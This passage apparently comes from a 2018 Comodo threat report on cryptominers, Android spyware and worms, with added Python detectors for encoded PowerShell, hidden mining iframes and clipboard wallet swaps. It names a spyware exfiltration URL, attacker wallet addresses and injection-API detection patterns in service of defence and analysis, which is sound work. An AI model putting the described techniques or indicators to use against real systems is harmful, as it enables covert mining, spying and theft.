Trojans let attackers gain time. As the malware acts covertly, the cybercriminals have more than enough time to use stolen data to their advantage. In many cases attacks can only be discovered too late, after money is withdrawn from a bank account, confidential data is published, etc. The merging of trojans as payloads and phishing emails as the means of delivery observed during Q2 will result in a huge surge in such attacks and victims. And using legitimate tools like PowerShell to run malware will amplify the number of victims even more, because such attacks are much harder to detect with antivirus software.
To fight these attacks, cybersecurity departments need to rearrange their approach to security measures in light of the new trends above. Combining the best malware detection tools with methods of protecting data, built on defense-in-depth principles, provides the most promising solution.
Chart data (Apr, May, Jun): 43188, 46382, 48881
3 Cryptominer Evolution
Going Fileless, Killing Competitors, Crashing Systems
Cryptominers do not lead the Q2 malware pack, but that does not mean their impact is greatly diminished. On the contrary, current cryptominer behavior recalls that of an army preparing for battle: training and reprovisioning to fight more efficiently. Cryptominers are quickly developing and gaining new, dangerous abilities.
Earlier cryptomining examples were only able to use infected machine resources to mine cryptocurrency on behalf of the attackers. For that reason many users did not regard them as particularly dangerous: at least cryptominers would not steal information or destroy data like other malware, merely sucking up CPU resources. Moreover, they typically do not employ strong obfuscation and can be easily discovered and deleted.
But Q2 events clearly showed that the situation has radically changed.
New samples of cryptominers detected by Comodo malware analysts exhibit far more harmful abilities than those required for merely mining cryptocurrency. These samples clearly show that cryptominers are transforming into a sophisticated and multifunctional weapon for cybercriminals. They are learning to hide and to fight against antimalware tools. They can camouflage themselves, kill competing cryptominers and even crash user systems if met with an attempt to delete the malware.
3.1 BadShell attacks enterprises
Fileless malware is next-generation malware, especially compared with traditional infection via .exe files. File-based malware resides on the hard drive, making it easier to detect. But fileless malware is different. As its name suggests, this type of malware is malicious code injected into legitimate OS processes. It need not be installed on a victim machine but functions only in memory, making it much harder for antiviruses to detect.
Usually such malware is spread via malicious ad banners. Clicking on a banner redirects a user to an infected website, where the malware covertly installs itself on the victim's computer. As many antivirus tools cannot detect it, users remain unaware of being infected. Not surprisingly, its use by cybercriminals is on the increase.
Last quarter, Comodo Threat Research Labs analysts faced a scenario of just such an attack. A company with several thousand endpoints was compromised by fileless malware. When their legacy security software failed to protect them, the company looked to Comodo Threat Research Labs for assistance.
Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows processes: PowerShell to execute commands, Task Scheduler to ensure persistence and the Registry to hold the malicious binary code. In the screenshots below you can see exactly how the malware, dubbed BadShell, works.
If we decode the PowerShell arguments, we see the malicious code in the registry. The code is injected into an existing running process by the PowerShell script.
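A quick way to surface this pattern in process-creation or scheduled-task logs is to decode the -EncodedCommand argument and look for the registry-read plus in-memory-execution combination. The Python below is an added example, not Comodo's tooling: the command line, the registry key HKCU:\Software\ExampleKey and the Invoke-Placeholder stand-in for the injection step are all constructed.

```python
import base64
import re

# PowerShell accepts -e, -ec, -enc and -EncodedCommand; the value is base64 of UTF-16LE text.
ENCODED_ARG = re.compile(r"(?i)(?<!\w)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
HIDDEN_WINDOW = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")

# Script-level indicators: (finding, pattern matched against the decoded script).
SCRIPT_INDICATORS = [
    ("payload read from registry", re.compile(r"(?i)Get-ItemProperty|HK(?:CU|LM):")),
    ("base64 blob decoded in memory", re.compile(r"(?i)FromBase64String")),
    ("memory-injection API referenced",
     re.compile(r"(?i)VirtualAlloc|WriteProcessMemory|CreateRemoteThread|OpenProcess")),
]
# Parent images that indicate a Task Scheduler launch (taskeng.exe on older Windows).
SCHEDULER_PARENTS = {"taskeng.exe"}


def decode_encoded_command(cmdline):
    """Return the decoded script from a PowerShell command line, or None if not encoded."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(cmdline, parent_image=""):
    """Score one process-creation record the way a BadShell-style hunt would."""
    findings = []
    if parent_image.lower().rsplit("\\", 1)[-1] in SCHEDULER_PARENTS:
        findings.append("launched by Task Scheduler (persistence)")
    if HIDDEN_WINDOW.search(cmdline):
        findings.append("hidden window")
    script = decode_encoded_command(cmdline)
    if script is not None:
        findings.append("encoded command")
        for name, pattern in SCRIPT_INDICATORS:
            if pattern.search(script):
                findings.append(name)
    return {"script": script, "findings": findings}


def build_sample():
    """Constructed log record: a scheduled task running an encoded PowerShell command."""
    script = ("$d=(Get-ItemProperty 'HKCU:\\Software\\ExampleKey').Blob;"
              "$b=[Convert]::FromBase64String($d);"
              "Invoke-Placeholder $b  # constructed stand-in for the injection step")
    encoded = base64.b64encode(script.encode("utf-16le")).decode("ascii")
    cmdline = f"powershell.exe -NoP -NonI -W Hidden -Enc {encoded}"
    return {"ParentImage": "C:\\Windows\\System32\\taskeng.exe", "CommandLine": cmdline}, script


if __name__ == "__main__":
    record, _ = build_sample()
    result = triage(record["CommandLine"], record["ParentImage"])
    print(result["script"])
    for finding in result["findings"]:
        print(" -", finding)
```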
BadShell at work
The malicious code in the registry
This emergency clearly demonstrates how dangerous cryptominer activity can be. Just imagine it: the entire compute capacity of the enterprise's computers was engaged in mining cryptocurrency, depriving employees of the ability to perform their jobs. Comodo analysts took over the situation and cleaned the infection from all involved computers, but of course the financial losses of the company were irreversible.
Invulnerability to antivirus and persistence in the system are the most important attributes for a cryptominer, because the longer it runs within the infected system, the more it profits the attackers. That is why cybercriminals give special attention to a cryptominer's ability to elude antivirus software.
Below is another cunning technique that turns an infected machine into a slave of the attacker.
3.2 WinstarNssmMiner: a system killer
Like other cryptominers, WinstarNssmMiner is purposed to steal computer resources to mine cryptocurrency coins for cybercriminals. But it has a special feature: it can root into a system so deeply that it becomes unremovable. Attempting to kill it will kill the target system totally.
The secret of WinstarNssmMiner's persistence lies in its method of infecting a victim's computer. It consists of two processes injected into two system svchost.exe processes. The first performs the main task: mining cryptocurrency. The other runs in the background, looking for antivirus products and disabling them.
The malicious code disguised as svchost.exe
Especially impressive is that both infected svchost.exe processes possess the system attribute "CriticalProcess", meaning that terminating either of them will crash the system, leaving the user with a blue screen.
WinstarNssmMiner spreading around the world
Cryptominers can kill not only victims' systems but also their cryptomining competitors.
3.3 CoinMiner kills rivals
CoinMiner stands out against other cryptominers with a kill-list feature that checks the infected machine for the presence of other cryptomalware. If an "alien" cryptominer is detected, the feature terminates its processes.
CoinMiner kills its rivals as follows.
The code below downloads CoinMiner for the Windows architecture (x86 or x64) and then checks whether a miner is already running by testing for the presence of an "AMDDriver64" process.
The code downloads CoinMiner and checks if a miner is already running
The malware maintains two lists, named $malwares and $malwares2, with the names of the processes that it is instructed to kill. The lists include other types of cryptominers.
In this way CoinMiner undividedly occupies the victim's computer to use its resources for mining cryptocurrency.
Some cryptominers earned the spotlight of the mass media and cybersecurity researchers, easing detection by users. In Q2 these cryptominers learned to hide. CoinHive is the brightest example of them.
3.4 CoinHive changes its skin
CoinHive is a popular JavaScript cryptominer. If you put its string of code into your website page, every visitor to the site will mine coins for you.
As you can see, the CoinHive script is easily detected.
The CoinHive script
After many publications on this subject in the mass media and in cybersecurity reports, users have started checking website code for cryptominers. But in the second quarter perpetrators found a way to overcome this obstacle. Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners.
As a result, the malicious code on a webpage looks like this.
The obfuscated malicious code on a webpage
If we decode the string, we encounter an iframe.
The iframe loads the URL shortener
Notice that the width and height of the iframe are set to 1 to make the iframe as invisible as possible.
Now let's look at the URL https://cnhv.co.
And there we find the familiar link to CoinHive.
The link to CoinHive
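The same decode-and-inspect steps can be automated by a site owner auditing their own pages. The Python below is an added example, not code from the report: it assumes the obfuscation layer is atob() or unescape() string wrapping (the report does not name the encoding), the iframe path /EXAMPLE is a placeholder rather than a real short link, and the sample page is constructed.

```python
import base64
import binascii
import re
from urllib.parse import unquote, urlparse

# cnhv.co is the shortener domain shown in the report; coinhive.com is the miner's own host.
KNOWN_MINING_HOSTS = {"cnhv.co", "coinhive.com"}

ATOB = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
UNESCAPE = re.compile(r"unescape\(\s*['\"]((?:%[0-9A-Fa-f]{2}|[^'\"])+)['\"]\s*\)")
IFRAME = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")


def decode_layers(html, max_layers=3):
    """Return html plus every string reachable by unwrapping atob()/unescape() calls."""
    seen, frontier, chunks = set(), [html], [html]
    for _ in range(max_layers):
        new = []
        for chunk in frontier:
            for m in ATOB.finditer(chunk):
                try:
                    s = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
                except (binascii.Error, ValueError):
                    continue
                if s not in seen:
                    seen.add(s)
                    new.append(s)
            for m in UNESCAPE.finditer(chunk):
                s = unquote(m.group(1))
                if s not in seen:
                    seen.add(s)
                    new.append(s)
        if not new:
            break
        chunks.extend(new)
        frontier = new
    return chunks


def _attrs(raw):
    out = {}
    for m in ATTR.finditer(raw):
        out[m.group(1).lower()] = next(g for g in m.groups()[1:] if g is not None)
    return out


def _pixels(value):
    """Numeric size of a width/height attribute; missing or unparseable counts as visible."""
    if value is None:
        return float("inf")
    digits = re.sub(r"[^0-9]", "", value)
    return int(digits) if digits else float("inf")


def find_hidden_iframes(html):
    """Flag iframes that are sized to be invisible or point at a known mining/shortener host."""
    findings = []
    for chunk in decode_layers(html):
        for m in IFRAME.finditer(chunk):
            a = _attrs(m.group(1))
            src = a.get("src", "")
            host = (urlparse(src).hostname or "").lower()
            style = a.get("style", "").replace(" ", "").lower()
            reasons = []
            tiny = _pixels(a.get("width")) <= 1 and _pixels(a.get("height")) <= 1
            if tiny or "display:none" in style or "visibility:hidden" in style:
                reasons.append("iframe sized or styled to be invisible")
            if host in KNOWN_MINING_HOSTS:
                reasons.append(f"loads known mining/shortener host {host}")
            if reasons:
                findings.append({"src": src, "reasons": reasons})
    return findings


# Constructed page: a benign embed plus a document.write(atob(...)) wrapper around a
# 1x1 iframe that loads the shortener (the path is a placeholder, not a real short link).
HIDDEN = '<iframe src="https://cnhv.co/EXAMPLE" width="1" height="1" frameborder="0"></iframe>'
SAMPLE_HTML = (
    '<p>Welcome</p><iframe src="https://video.example/embed/1" width="560" height="315"></iframe>'
    '<script>document.write(atob("' + base64.b64encode(HIDDEN.encode()).decode() + '"))</script>'
)

if __name__ == "__main__":
    for finding in find_hidden_iframes(SAMPLE_HTML):
        print(finding["src"], "->", "; ".join(finding["reasons"]))
```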
What is the impact of this trick? In a simple scenario, a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the webpage code but doesn't find any signs of a cryptominer. So she concludes that something went wrong with her PC, while CoinHive co-opts her computer to mine cryptocoins.
The next malware in our list prefers not to mine cryptocurrency but to steal it on the fly.
3.5 Cryptocurrency clipboard hijacker intercepts transfers
It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour an infected machine's resources but instead actually steals cryptocurrency, redirecting it to the perpetrator.
Cryptocurrency transfers require a wallet address. The address is a long string combining different characters and numbers, so it is almost impossible to remember it or fill it in manually. That is why users usually copy-paste a wallet address to make a transaction. Cybercriminals regard this copy-paste process as a breach they can use to their advantage.
The cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. Upon finding one, it changes it to the address of a wallet under the attacker's control. So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminals' hands.
New Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses
This malware is distributed in a bundle with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers, but cybercriminals copied the program and added the malicious code. The malicious version of All-Radio 4.27 was used for spreading different types of malware, clipboard cryptocurrency hijackers among them.
Here is an example of a clipboard hijacker attack.
A user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.
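A host-side guard can catch the swap described above by watching the sequence of clipboard writes rather than the addresses themselves. The Python below is an added example, not Comodo's code: the clipboard event log is constructed, the hijacker process name is a placeholder, and only the legacy Base58 address shape used in the report's example is recognised.

```python
import re
from dataclasses import dataclass

# Legacy Bitcoin address shape: leading 1 (P2PKH) or 3 (P2SH), Base58 alphabet, 26-35 chars.
# Assumption: the report's example uses this address type; bech32 (bc1...) is out of scope here.
BTC_LEGACY = re.compile(r"^[13][1-9A-HJ-NP-Za-km-z]{25,34}$")


@dataclass
class ClipEvent:
    t: float        # seconds since monitoring started (constructed)
    process: str    # process that wrote the clipboard
    text: str       # clipboard contents after the write


def looks_like_wallet(text):
    return bool(BTC_LEGACY.match(text.strip()))


def detect_swaps(events, window=2.0):
    """Flag a wallet address overwritten by a different wallet address, by a different
    process, within `window` seconds: the signature a clipboard hijacker leaves behind."""
    alerts = []
    for prev, cur in zip(events, events[1:]):
        if (looks_like_wallet(prev.text) and looks_like_wallet(cur.text)
                and prev.text != cur.text
                and cur.process != prev.process
                and cur.t - prev.t <= window):
            alerts.append({"t": cur.t, "process": cur.process,
                           "copied": prev.text, "replaced_with": cur.text})
    return alerts


# Constructed clipboard timeline using the two addresses quoted in the report.
SAMPLE_EVENTS = [
    ClipEvent(0.0, "chrome.exe", "meeting notes"),
    ClipEvent(5.0, "chrome.exe", "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"),
    ClipEvent(5.2, "hijacker_placeholder.exe", "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"),
    # The user later re-copies the same text from the same process: not a swap.
    ClipEvent(40.0, "chrome.exe", "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"),
]

if __name__ == "__main__":
    for alert in detect_swaps(SAMPLE_EVENTS):
        print(f"t={alert['t']}: {alert['process']} replaced {alert['copied']} "
              f"with {alert['replaced_with']}")
```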
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
Although cryptominers have decreased in quantity, they seem to be coming back in an updated disguise and promise to become a new, serious challenge for cybersecurity departments and vendors.
4 Android Devices Under Siege
4.1 Spying, Stealing, Mining
Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. It is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers. Today every smartphone contains a plethora of confidential information about its owner.
If the victim is a CEO, politician or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, not only cybercriminals hunt for smartphone content. Intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.
Today spying is the number one purpose of Android malware. In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.
The digital spooks
Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection and hone their tradecraft from version to version.
4.1.1 KevDroid
The first is named KevDroid. It is distributed in three versions:
Version 1: Naver Defender
Version 2: Netease Defender
Version 3: PU
Disguises of KevDroid
The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional spying abilities. It steals account details: contacts, ID, name, phone numbers and email address of the owner. It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email, type) and photos of the contacts. After extracting all the data, the malware encrypts it with the AES algorithm and sends it to the attackers' server http://cgalim.com/admin/hr/pu/pu.php?do=upload.
KevDroid records the victim's every phone call, then encrypts and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps and the launcher name.
The second version, Netease Defender, has additional spying abilities. It takes control of the device camera and covertly records the victim's activity. Then it sends the video to the attackers' server.
Version 3 of KevDroid takes photos, records calls and creates a list of files on the device. It also extracts the web history, account and contact details, and the device information.
People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of the Desert Scorpion spyware was spread via official Google Play Services. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment the spyware constantly kept track of all events on the infected device. Another means of the malware's dissemination was social networks.
Version 1: Dardesh, Google Play Services, Instant Apps
Version 2: Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts the metadata and makes changes on the victim device.
4.1.2 Zoo Park
The next member of the spy family, Zoo Park, has 4 different versions:
Version 1: Telegram Groups, انتخاب دھم
Version 2: Postrall, Yes For Referendum, انتخاب دھم
Version 3: Celebs Gone Wild, جریدة النھار الکویتیة, 剑侠挂机
Version 4: VPN Easy, DroFirewall, m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app. It extracts Accounts and Contacts details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, Network Operator Name, SDK version, OS version, etc.), Call Log details and External Storage content.
The third version is included in spyware named "Spymaster Pro" and can:
Enable and disable the GPS services
Record audio and send it to the Command & Control server
Upload image files
Collect information about the installed applications
Collect browser data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.
In addition to the abilities of the previous versions, it includes some additional tricks:
Extracts photos, audio and video
Records the screen
Executes shell commands
Records calls
4.1.3 MikeSpy
Some spyware examples specifically hunt for messengers' data, like the next digital spook, MikeSpy.
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflages itself as a Virtual Girlfriend application. But instead of a girlfriend, it has a bundle of malicious abilities:
Takes control of the Bluetooth adapter
Extracts data about accounts, contact details and installed apps
Extracts data from the WhatsApp message DB and related keys
Uploads collected data to the cybercriminals' server via FTP
4.1.4 Xloader
The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.
Version 1 to Version 3: Facebook, Chrome
Disguises of Xloader
After infection, Xloader connects to its C&C server and executes the following commands:
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs
Extract contact details
Set Wi-Fi always turned on
Version 2 can execute additional commands:
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access a location specified by the attackers
Make recordings
Make calls
4.1.5 Stalker Spy
The next malware in our list is Stalker Spy. As you can see, it is a champion in the number of masks it puts on to deceive users.
App Distribution
FlexiSpy, MBackup
HelloSpy, ProActivator, TActivator, Setting, Wi-Fi Settings, ردیاب اسپای ھاید, Keylogger, System Service
Mobile Spy
随意代挂, Subway Surfers, 라이브성인방송, Мобильный антивирус, droidgetlogevent, SmartcardService, Cheats Z
CloudAgent, New Insta Follow, Android CJ 대한통운 택배, 余生代挂APP, Basic Daydreams, SystemWifiService, Samplecom, мобильный клиент, Asa刷钻
Disguises of Stalker Spy
In addition to the usual must-have spyware set, Xloader can turn on the microphone remotely on the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy, MobiSpy.
4.1.6 Mystery Bot
The next malware is much more than a spy. The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption the malware deletes the original files. So we can call it a spy with a "007 licence".
Version 1: Adobe Flash Player
Version 2: Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player. Below is a list of some commands that the malware can execute on your device:
Send_SMS - extract SMS content and send it to the C&C server
Send_USSD - send the USSD to the C&C server
Gethistory - monitor browser history
Start_AllApp - gather info about installed applications
Send_call - set the Intent action to call
Forward_call - forward incoming calls
ResForward_call - reset call forwarding
Go_Smsmnd - delete SMS content
Go_GetAlls - get SMS history
Dell_sms - delete SMS content in a conversation
Send_spam - send spam SMS
Start_Inject - call the injectors class
4.1.7 FakeSpy
FakeSpy also has many masks, which you can see in the screenshot.
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: au.com.app, softbank.com.app, docomo.com.app.
Here are some commands from its Command and Control server:
contacts - get contact details and email ID
Mute - set action to mute
Mms - get MMS content
info - get device information
4.1.8 RedAlert
RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.
Version 1: EbookReader, Update Flash Player, Android Update, WhatsApp, Viber
Version 2: Update Google Market, Flash Player, Tactic, FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:
de.postbank.finanzassistent
pl.mbank
aib.ibank.android
The second version can block access to some websites, including Google Chrome, Google Play store, Gmail and YouTube.
4.1.9 Hero Rat
The next digital spook, Hero Rat, mostly acts on Iranian territory. It uses third-party app stores, social networks and messengers for spreading.
Version 1: CloudVPN, MyIrancel, Mtproto, زیـــــبانـــــویس تلگرام ھمھ کاره, Proxy, دوست یاب, Telegram Ton, شارژ رایگان بگیر, App Master, Anti Rat, PlatformA, فالورگیر نامحدود, اینترنت رایگان
Disguises of Hero Rat
Its code is available on the Telegram hacking channel. Noticeably, it is sold in three options: bronze, silver and gold.
After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts the spying activity. It steals text messages and audio records, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.
Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get free Followers and Telegram versions for the Iranian market.
4.1.10 Sonvpay
The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.
Version 1: Caculator-2018, Despacito Ringtone, CaroGame2018, Wifi-Hostpot, Reccoder-Call, QRCodeBar Scanner APK, Let me love you ringtone, Iphone Ringtone, Night light, Beauty camera-Photo editor, Shape of you ringtone
Disguises of Sonvpay
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip option". If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.
It comes to victims in the variety of disguises named above.
4.1.11 CoinHive
And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of them updating its mining potential. It is disseminated via the counterfeit apps you see below. But one of the vectors is especially interesting.
Version 1: Netflix Hack, Instagram Hack
Version 2: TSF Launcher
Version 3: Android Service, PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via ... another cryptominer, named CoinMiner.
How is it possible? Let's imagine a cybercriminal who wants to infect victims with a cryptominer to utilize their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim too: thief robbing thief.
This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.
4.2 Android Malware Catalogued by Month
Below you will find detailed statistics on Android-targeted malware by month.
4.2.1 April 2018
Android-targeted malware in April
4.2.2 May 2018
Android-targeted malware in May
4.2.3 June 2018
Android-targeted malware in June
5 Malware in Q2 2018: The Big Picture
Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries' top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.
5.1 Strategic Threat: Computer Worms
A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial of service. For this Q2 2018 Report we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.
5.1.1 Generic Worms
This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.
Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.
The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.
And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.
5.1.2 Net Worms
A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses it from a local area network (LAN) or company intranet.
In Q2 2018 Allaple was the most common Net Worm detected, which Microsoft describes as a "multi-threaded polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.
The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.
5.1.3 Email Worms
Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.
This quarter the most common Email Worm by far was Runonce.
The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).
This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.
5.1.4 p2p Worms
A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.
Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects .exe and .scr files and may leverage the Gnutella p2p network protocol to distribute copies of itself.
The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many.
5.1.5 IM Worms
Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.
During Q2 2018 most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.
This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.
This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.
5.2 High Threat Malware
In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.
5.2.1 Backdoors
A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.
The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.
The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses
A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.
Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files and spreads through infected removable drives such as USB flash drives.
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.
This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.
5.2.3 Trojans
Trojans take their name from the famous wooden horse of Greek mythology, due to the malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.
In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".
The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.
And this timeline shows when this huge Trojan infestation took place: in the beginning of June 2018.
5.2.4 Exploits
Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial-of-service (DoS).
The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (.pdf) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
5.3 Medium Threat Malware
In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.
5.3.1 Constructor
Constructors are applications that can be used to automatically create malware files.
For Q2 Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.
In Q2 Germany (de) was the top country of detection for Constructors.
And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.
5.3.2 Packers
